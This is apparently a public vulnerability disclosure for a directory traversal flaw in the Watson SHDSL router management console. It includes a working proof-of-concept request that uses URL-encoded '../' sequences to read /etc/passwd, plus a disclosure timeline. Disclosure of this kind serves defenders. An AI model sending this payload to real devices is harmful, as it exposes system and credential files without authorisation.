Watson SHDSL Routers Management Console contains a flaw that allows an attacker to traverse outside of a restricted path. The issue is due to the program not properly sanitizing user input, specifically directory traversal style attacks (e.g., ../../). This directory traversal attack would allow a remote attacker to gain access to arbitrary files.
Proof of Concept:
http://www.example.com
in burpsuite proxy or any proxy http request proxy that u use edit the
Request paramater to
GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd
HTTP/1.1
Disclosure Timeline:
Vendor Informed Date :2012-12-17
Disclosure Date :2013-01-09
Exploit Publish Date :2013-01-09